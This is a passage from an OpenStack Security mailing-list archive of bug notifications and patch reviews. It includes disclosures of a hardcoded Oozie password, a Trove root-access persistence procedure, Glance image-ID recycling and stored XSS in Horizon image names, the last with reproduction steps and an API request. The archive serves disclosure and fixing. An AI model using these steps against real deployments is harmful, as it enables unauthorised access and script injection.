From 1541122 at bugs.launchpad.net Thu Sep 1 08:52:34 2016 From: 1541122 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Sep 2016 08:52:34 -0000 Subject: [Openstack-security] [Bug 1541122] Fix included in openstack/sahara 5.0.0.0b3 References: <20160202222341.14647.37585.malonedeb@gac.canonical.com> Message-ID: <20160901085234.18113.37707.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/sahara 5.0.0.0b3 development milestone. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1541122 Title: Vanilla plugin uses hardcoded password for Oozie MySQL database user Status in OpenStack Security Advisory: Won't Fix Status in Sahara: Fix Released Bug description: When deploying clusters with the vanilla plugin, the Oozie[1] application must be configured to use a database for storing data related to the scheduling, running, and processing of Hadoop jobs. Oozie is the primary scheduler for jobs entering the Hadoop ecosystem through the vanilla plugin. Sahara configures the credentials for Oozie to access its database, this can be seen in sahara/plugins/vanilla/hadoop2/oozie_helper.py [2]. These credentials are hardcoded, and use a weak password. An intruder with access to the nodes of a cluster that is created by sahara with the vanilla plugin will have access to the database that backs the Oozie installation. With this access, the intruder could change the operational effects of Oozie to produce results other than expected, for example inserting new jobs or altering configurations associated with currently running jobs. As sahara has ultimate control over the deployment and configuration of Oozie on nodes deployed in its clusters, this hardcoded password should be changed in favor of a random password that will be generated uniquely for each deployed cluster. Oozie uses the values associated with the configurations defined in [2] to create the credentials, this means that the change should be a matter of simply changing the source valueof the password for the Oozie user. [1]: https://oozie.apache.org/ [2]: https://github.com/openstack/sahara/blob/master/sahara/plugins/vanilla/hadoop2/oozie_helper.py#L41 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1541122/+subscriptions From 1619039 at bugs.launchpad.net Sun Sep 4 02:26:43 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Sun, 04 Sep 2016 02:26:43 -0000 Subject: [Openstack-security] [Bug 1619039] Re: Logging of martian packets should be configurable References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160904022643.16161.35084.malone@soybean.canonical.com> Reviewed: https://review.openstack.org/363933 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=e58ae245ad8bc334cc75ef648d3fcbe73bbbf648 Submitter: Jenkins Branch: master commit e58ae245ad8bc334cc75ef648d3fcbe73bbbf648 Author: Major Hayden Date: Wed Aug 31 15:54:48 2016 -0500 Disable martian logging by default This patch disables martian packet logging and updates the documentation to reflect the new default. A release note is also included to make deployers aware of the change. Closes-bug: 1619039 Change-Id: I4b19aa1200298a92c85824e319bb919260e5a6d0 ** Changed in: openstack-ansible Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1617343 at bugs.launchpad.net Sun Sep 4 02:28:06 2016 From: 1617343 at bugs.launchpad.net (OpenStack Infra) Date: Sun, 04 Sep 2016 02:28:06 -0000 Subject: [Openstack-security] [Bug 1617343] Re: AIDE should not look at changes in /run References: <20160826141422.16089.54915.malonedeb@soybean.canonical.com> Message-ID: <20160904022806.14682.7205.malone@wampee.canonical.com> Reviewed: https://review.openstack.org/362830 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=e7373c4985ae8f4921b54002e2416554cb0da200 Submitter: Jenkins Branch: liberty commit e7373c4985ae8f4921b54002e2416554cb0da200 Author: Major Hayden Date: Fri Aug 26 09:17:18 2016 -0500 Exclude /run from AIDE checks The /run directory contains items that change frequently and often change when services start/stop or the system reboots. This patch excludes the /run directory from AIDE checks. Closes-bug: 1617343 Backport-of: Ic915d4821c8a90c613c5822c6d54c2f7ab54da16 Change-Id: Ib74d6ec24991039299b3ad2c2d550f488fc463ba ** Tags added: in-liberty -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1617343 Title: AIDE should not look at changes in /run Status in openstack-ansible: Fix Released Bug description: AIDE shouldn't be wandering into /run since things there only live temporarily. --------------------------------------------------- Changed entries: --------------------------------------------------- d =.... mc.. .. .: /etc/apparmor.d/libvirt d =.... mc.. .. .: /etc/libvirt/qemu d =.... mc.. .. .: /root f >b... mc..C.. .: /root/.bash_history f >.... mc..C.. .: /root/.ssh/known_hosts f >b... mci.C.. .: /root/.viminfo f =.... mci.C.. : /run/motd.dynamic d >.... mc.. .. : /run/shm f =.... ....C.. : /run/shm/spice.29052 d =.... mc.. .. : /run/systemd/sessions d =.... mc.. .. : /run/systemd/users f =.... mci.C.. : /run/systemd/users/0 d >.... . .. : /run/udev/data d =.... mc.. .. : /run/user To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1617343/+subscriptions From 1616281 at bugs.launchpad.net Sun Sep 4 02:27:59 2016 From: 1616281 at bugs.launchpad.net (OpenStack Infra) Date: Sun, 04 Sep 2016 02:27:59 -0000 Subject: [Openstack-security] [Bug 1616281] Re: Can't initialize AIDE during subsequent playbook runs References: <20160824023003.4754.11744.malonedeb@gac.canonical.com> Message-ID: <20160904022759.4914.83298.malone@wampee.canonical.com> Reviewed: https://review.openstack.org/362828 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=6c9eb50fd64cb791a73ef778315f9a52b8c434c8 Submitter: Jenkins Branch: liberty commit 6c9eb50fd64cb791a73ef778315f9a52b8c434c8 Author: Major Hayden Date: Mon Aug 29 11:11:09 2016 -0500 Ensure AIDE initializes on subsequent runs If a deployer installs AIDE the first time they apply the role without initializing AIDE and they want to initialize it later, the handler that does the initialization never fires. This patch does a few things: - Ensures AIDE initialization if the initialize_aide bool is True - Doesn't intialize the AIDE db if it already exists - Moves the new db into place on Red Hat systems - Moves the AIDE tasks into its own file with tags - Prevents AIDE from trawling through /var Manual backport of two reviews: * https://review.openstack.org/#/c/359554/ * https://review.openstack.org/#/c/361460/ Closes-Bug: 1616281 Backport-of: I170eb3898b4336333b1fbe663ec4f069823898e0 Change-Id: Iaedcce1d6416f2224f44376336c23702e6152a00 ** Tags added: in-liberty -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1616281 Title: Can't initialize AIDE during subsequent playbook runs Status in openstack-ansible: Fix Released Bug description: AIDE isn't initialized by default because it can cause a lot of system load when it does its first check of a new system. If a deployer applies the security hardening role with ``initialize_aide`` set to False (the default), it won't be initialized. However, if they set it to True and re-run the playbook, AIDE is already configured and the handler to initialize AIDE won't execute. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1616281/+subscriptions From 1619039 at bugs.launchpad.net Tue Sep 6 15:25:19 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 06 Sep 2016 15:25:19 -0000 Subject: [Openstack-security] [Bug 1619039] Fix proposed to openstack-ansible-security (stable/mitaka) References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160906152519.3952.62807.malone@wampee.canonical.com> Fix proposed to branch: stable/mitaka Review: https://review.openstack.org/366203 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1619039 at bugs.launchpad.net Tue Sep 6 15:25:36 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 06 Sep 2016 15:25:36 -0000 Subject: [Openstack-security] [Bug 1619039] Fix proposed to openstack-ansible-security (liberty) References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160906152536.13185.27465.malone@soybean.canonical.com> Fix proposed to branch: liberty Review: https://review.openstack.org/366204 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1514569 at bugs.launchpad.net Tue Sep 6 17:36:11 2016 From: 1514569 at bugs.launchpad.net (Amrith) Date: Tue, 06 Sep 2016 17:36:11 -0000 Subject: [Openstack-security] [Bug 1514569] Re: Fix Postgres root-enable References: <20151109195235.21620.71031.malonedeb@soybean.canonical.com> Message-ID: <20160906173613.32623.73245.launchpad@gac.canonical.com> ** Changed in: trove Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1514569 Title: Fix Postgres root-enable Status in OpenStack DBaaS (Trove): Fix Released Bug description: Fix PostgreSQL root functions The default PostgreSQL administration account is 'postgres'. In the current implementation Trove uses the 'postgres' account and return a new superuser called 'root' when the root access is requested. The user 'root' has however no special meaning in PostgreSQL and the existing applications may rely on the default superuser name 'postgres'. Trove should be using its own administrative account (os_admin) instead. Notes: The current implementation is broken for variaous reasons: - It uses UUIDs in place of 'secure' password. - It creates a 'root' user, but no database for it. The clients won't be able to authenticate without explicitly providing an existing database name. - The created 'root' user has no 'SUPERUSER' attribute and hence is not a real superuser (cannot perform certain tasks)... - The implementation suffers a defect that allows a non-root user gain root access to an instance without marking is as 'root-enabled' A similar defect exists in other datastores (MySQL) too: 1. Create an instance. 2. Enable root. 3. Use your root access to change the password of the built-in 'postgres' account (Trove will still work because it uses the 'peer' authentication method - the UNIX account). 4. Login as 'postgres' using the changed password and drop the created 'root' account. 5. Backup & restore the instance. 6. Trove reports the root has never been enabled (it checks for existence of superuser accounts other than the built-in 'postgres'). 7. You enjoy the root access of the 'postgres' user (the password is not reset on restore). To manage notifications about this bug go to: https://bugs.launchpad.net/trove/+bug/1514569/+subscriptions From 1619039 at bugs.launchpad.net Wed Sep 7 14:26:56 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 07 Sep 2016 14:26:56 -0000 Subject: [Openstack-security] [Bug 1619039] Re: Logging of martian packets should be configurable References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160907142656.306.27621.malone@gac.canonical.com> Reviewed: https://review.openstack.org/366204 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=31a8ff54d7ad8798b2a3dc5eb517bedd03e04592 Submitter: Jenkins Branch: liberty commit 31a8ff54d7ad8798b2a3dc5eb517bedd03e04592 Author: Major Hayden Date: Wed Aug 31 15:54:48 2016 -0500 Disable martian logging by default This patch disables martian packet logging and updates the documentation to reflect the new default. A release note is also included to make deployers aware of the change. Manual-backport-of: I4b19aa1200298a92c85824e319bb919260e5a6d0 Closes-bug: 1619039 Change-Id: I10476844810421587455e263afb173f8b868c261 ** Tags added: in-liberty ** Tags added: in-stable-mitaka -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1619039 at bugs.launchpad.net Wed Sep 7 14:28:28 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 07 Sep 2016 14:28:28 -0000 Subject: [Openstack-security] [Bug 1619039] Fix merged to openstack-ansible-security (stable/mitaka) References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160907142828.11827.66372.malone@chaenomeles.canonical.com> Reviewed: https://review.openstack.org/366203 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=775f641513dbccbb9e73a955082bacf0c76ede66 Submitter: Jenkins Branch: stable/mitaka commit 775f641513dbccbb9e73a955082bacf0c76ede66 Author: Major Hayden Date: Wed Aug 31 15:54:48 2016 -0500 Disable martian logging by default This patch disables martian packet logging and updates the documentation to reflect the new default. A release note is also included to make deployers aware of the change. Manual-backport-of: I4b19aa1200298a92c85824e319bb919260e5a6d0 Closes-bug: 1619039 Change-Id: I10476844810421587455e263afb173f8b868c261 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From major at mhtx.net Mon Sep 12 16:29:06 2016 From: major at mhtx.net (Major Hayden) Date: Mon, 12 Sep 2016 16:29:06 -0000 Subject: [Openstack-security] [Bug 1622674] [NEW] V-38540 doesn't include /etc/sysconfig/network Message-ID: <20160912162906.2515.64807.malonedeb@soybean.canonical.com> Public bug reported: V-38540 includes all of the Ubuntu network configuration paths, but it doesn't include /etc/sysconfig/network (used in CentOS/RHEL). ** Affects: openstack-ansible Importance: Low Assignee: Major Hayden (rackerhacker) Status: New ** Tags: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622674 Title: V-38540 doesn't include /etc/sysconfig/network Status in openstack-ansible: New Bug description: V-38540 includes all of the Ubuntu network configuration paths, but it doesn't include /etc/sysconfig/network (used in CentOS/RHEL). To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1622674/+subscriptions From 1622674 at bugs.launchpad.net Mon Sep 12 17:46:00 2016 From: 1622674 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 12 Sep 2016 17:46:00 -0000 Subject: [Openstack-security] [Bug 1622674] Re: V-38540 doesn't include /etc/sysconfig/network References: <20160912162906.2515.64807.malonedeb@soybean.canonical.com> Message-ID: <20160912174600.11954.82051.malone@gac.canonical.com> Fix proposed to branch: master Review: https://review.openstack.org/368991 ** Changed in: openstack-ansible Status: New => In Progress -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622674 Title: V-38540 doesn't include /etc/sysconfig/network Status in openstack-ansible: In Progress Bug description: V-38540 includes all of the Ubuntu network configuration paths, but it doesn't include /etc/sysconfig/network (used in CentOS/RHEL). To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1622674/+subscriptions From 1595669 at bugs.launchpad.net Mon Sep 12 19:28:08 2016 From: 1595669 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 12 Sep 2016 19:28:08 -0000 Subject: [Openstack-security] [Bug 1595669] Re: Separate documentation for STIGs that aren't in Ansible References: <20160623190721.1729.88002.malonedeb@chaenomeles.canonical.com> Message-ID: <20160912192810.11876.1242.launchpad@gac.canonical.com> ** Changed in: openstack-ansible Status: Confirmed => In Progress -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1595669 Title: Separate documentation for STIGs that aren't in Ansible Status in openstack-ansible: In Progress Bug description: Create separate documentation for STIGs that aren't in Ansible To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1595669/+subscriptions From 1595669 at bugs.launchpad.net Tue Sep 13 10:01:48 2016 From: 1595669 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 13 Sep 2016 10:01:48 -0000 Subject: [Openstack-security] [Bug 1595669] Re: Separate documentation for STIGs that aren't in Ansible References: <20160623190721.1729.88002.malonedeb@chaenomeles.canonical.com> Message-ID: <20160913100148.12315.84130.malone@gac.canonical.com> Reviewed: https://review.openstack.org/368957 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=3c19f00a7f29d723c157e935651c7748ef0a8e7c Submitter: Jenkins Branch: master commit 3c19f00a7f29d723c157e935651c7748ef0a8e7c Author: Major Hayden Date: Mon Sep 12 14:07:16 2016 -0500 [Docs] Metadata cleanup This patch adds the right tags to each piece of metadata and corrects small errors found in the deployer notes. Closes-bug: 1595669 Change-Id: Ic04aaad85ebf111be5a0bdb01a350442fdea1433 ** Changed in: openstack-ansible Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1595669 Title: Separate documentation for STIGs that aren't in Ansible Status in openstack-ansible: Fix Released Bug description: Create separate documentation for STIGs that aren't in Ansible To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1595669/+subscriptions From 1622674 at bugs.launchpad.net Wed Sep 14 02:02:45 2016 From: 1622674 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 14 Sep 2016 02:02:45 -0000 Subject: [Openstack-security] [Bug 1622674] Re: V-38540 doesn't include /etc/sysconfig/network References: <20160912162906.2515.64807.malonedeb@soybean.canonical.com> Message-ID: <20160914020245.11804.61443.malone@gac.canonical.com> Reviewed: https://review.openstack.org/368991 Committed: https://git.openstack.org/cgit/openstack/openstack-ansible-security/commit/?id=c93b1676cca4d457f77aaff6a83b77faa419fbea Submitter: Jenkins Branch: master commit c93b1676cca4d457f77aaff6a83b77faa419fbea Author: Major Hayden Date: Mon Sep 12 14:51:58 2016 -0500 Add network conf auditing on CentOS This patch adds in auditing for /etc/sysconfig/network. Closes-bug: 1622674 Change-Id: I0de15a130161ed1f8a6bdb2a7de33c55b91d6609 ** Changed in: openstack-ansible Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622674 Title: V-38540 doesn't include /etc/sysconfig/network Status in openstack-ansible: Fix Released Bug description: V-38540 includes all of the Ubuntu network configuration paths, but it doesn't include /etc/sysconfig/network (used in CentOS/RHEL). To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1622674/+subscriptions From dklyle0 at gmail.com Wed Sep 14 19:31:18 2016 From: dklyle0 at gmail.com (David Lyle) Date: Wed, 14 Sep 2016 19:31:18 -0000 Subject: [Openstack-security] [Bug 1622690] Re: Potential XSS in image create modal or angular table References: <20160912171951.2128.2126.malonedeb@wampee.canonical.com> Message-ID: <20160914193120.2408.91491.launchpad@chaenomeles.canonical.com> ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622690 Title: Potential XSS in image create modal or angular table Status in OpenStack Dashboard (Horizon): Fix Committed Status in OpenStack Security Advisory: Won't Fix Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

This is bad

, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1622690/+subscriptions From gerrit2 at review.openstack.org Wed Sep 14 21:11:22 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Wed, 14 Sep 2016 21:11:22 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/366750 Log: commit 7a75f49413d9ad0b4dc9696b126a96cee7023593 Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b From gerrit2 at review.openstack.org Thu Sep 15 13:42:37 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Thu, 15 Sep 2016 13:42:37 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/366750 Log: commit 43a7b56dd333615c00d6c794db4b45b6fe125b82 Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b From fungi at yuggoth.org Thu Sep 15 17:40:05 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 15 Sep 2016 17:40:05 -0000 Subject: [Openstack-security] [Bug 1593799] Re: glance-manage db purge breaks image immutability promise References: <20160617171339.24588.32339.malonedeb@gac.canonical.com> Message-ID: <20160915174005.1477.32150.malone@wampee.canonical.com> Yes, ideally it should have been switched to public (and a bug tag of "security" added) prior to distributing the OSSN, so that those reading it could make use of the bug link it contained. I'll go ahead and do that now. ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1593799 Title: glance-manage db purge breaks image immutability promise Status in Glance: Confirmed Status in OpenStack Security Advisory: Opinion Status in OpenStack Security Notes: Fix Released Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. Using glance-manage db purge command opens possibility to recycle image-IDs. When the row is deleted from the database the ID is not known by glance anymore and thus it's not unique during the deployment lifecycle. This opens possibility to following scenario: 1) End user boots VM from private/public/shared image. 2) Image owner deletes the image. 3) glance-manage db purge gets ran which deletes record that image has ever existed. 4) Either malicious user or someone unintentionally creates new image with same ID (being same user so having access to the image by owning it or it becoming public/shared(/possbly community at some point)) 5) Same end user boots either snapshot from the original image or nova needs to migrate the VM to another host. Now the user's VM will be rebuilt on top of the new image. Worst case scenario the user had no idea that the image data changed in between. This behavior breaks Glance image immutability promise that has bee stated that the data related to image ID that has gone active will never change. We have two solutions for this. Either we introduce table to track the deleted image-IDs and get glance to cross check that during the image create or we leave it as is but issue notice/documentation what are the implications if the purge is used transferring the responsibility to the cloud operators. This was partially discussed in the virtual glance midcycle meetup so it might not be justified to leave this as private but I wanted to leave that decision to VMT. To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1593799/+subscriptions From fungi at yuggoth.org Fri Sep 16 00:45:11 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 16 Sep 2016 00:45:11 -0000 Subject: [Openstack-security] [Bug 1623735] Re: Stored XSS in Glance Image Names References: <20160915005554.1628.91491.malonedeb@chaenomeles.canonical.com> Message-ID: <20160916004512.1895.73327.launchpad@soybean.canonical.com> *** This bug is a duplicate of bug 1622690 *** https://bugs.launchpad.net/bugs/1622690 ** Information type changed from Private Security to Public ** This bug has been marked a duplicate of bug 1622690 Potential XSS in image create modal or angular table ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - - -- - My team is currently testing Glance with the API security testing tool we've developed (https://github.com/openstack/syntribos), and in the course of testing I discovered a cross-site scripting issue in Horizon stemming from Glance image names. ========================= Request to Glance: POST /v2/images HTTP/1.1 Host: [GLANCE ENDPOINT] Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [TOKEN] Content-Length: 207 {"protected": false, "name": "", "tags": ["testing"], "container_format": "bare", "disk_format": "raw", "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "visibility": "private"} HTTP/1.1 201 Created Content-Length: 585 Content-Type: application/json; charset=UTF-8 Location: http://[GLANCE ENDPOINT]/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de X-Openstack-Request-Id: req-e7150b2a-9a52-44a0-bd8d-1663dfc95524 Date: Thu, 15 Sep 2016 00:26:57 GMT Connection: close {"status": "queued", "name": "", "tags": ["testing"], "container_format": "bare", "created_at": "2016-09-15T00:26:57Z", "size": null, "disk_format": "raw", "updated_at": "2016-09-15T00:26:57Z", "visibility": "private", "self": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "min_disk": 0, "protected": false, "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "file": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de/file", "checksum": null, "owner": "823c88c894af4aafa0b8f12d2eb8f1be", "virtual_size": null, "min_ram": 0, "schema": "/v2/schemas/image"} ========================= This will percolate into Horizon's list view of Glance images (/admin/images), and result in an alert box popping up (see attached screenshot). -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1623735 Title: Stored XSS in Glance Image Names Status in OpenStack Dashboard (Horizon): New Status in OpenStack Security Advisory: Incomplete Bug description: My team is currently testing Glance with the API security testing tool we've developed (https://github.com/openstack/syntribos), and in the course of testing I discovered a cross-site scripting issue in Horizon stemming from Glance image names. ========================= Request to Glance: POST /v2/images HTTP/1.1 Host: [GLANCE ENDPOINT] Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [TOKEN] Content-Length: 207 {"protected": false, "name": "", "tags": ["testing"], "container_format": "bare", "disk_format": "raw", "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "visibility": "private"} HTTP/1.1 201 Created Content-Length: 585 Content-Type: application/json; charset=UTF-8 Location: http://[GLANCE ENDPOINT]/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de X-Openstack-Request-Id: req-e7150b2a-9a52-44a0-bd8d-1663dfc95524 Date: Thu, 15 Sep 2016 00:26:57 GMT Connection: close {"status": "queued", "name": "", "tags": ["testing"], "container_format": "bare", "created_at": "2016-09-15T00:26:57Z", "size": null, "disk_format": "raw", "updated_at": "2016-09-15T00:26:57Z", "visibility": "private", "self": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "min_disk": 0, "protected": false, "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "file": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de/file", "checksum": null, "owner": "823c88c894af4aafa0b8f12d2eb8f1be", "virtual_size": null, "min_ram": 0, "schema": "/v2/schemas/image"} ========================= This will percolate into Horizon's list view of Glance images (/admin/images), and result in an alert box popping up (see attached screenshot). To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1623735/+subscriptions From fungi at yuggoth.org Fri Sep 16 00:46:49 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 16 Sep 2016 00:46:49 -0000 Subject: [Openstack-security] [Bug 1622690] Re: Potential XSS in image create modal or angular table References: <20160912171951.2128.2126.malonedeb@wampee.canonical.com> Message-ID: <20160916004649.1896.83803.launchpad@wampee.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

This is bad

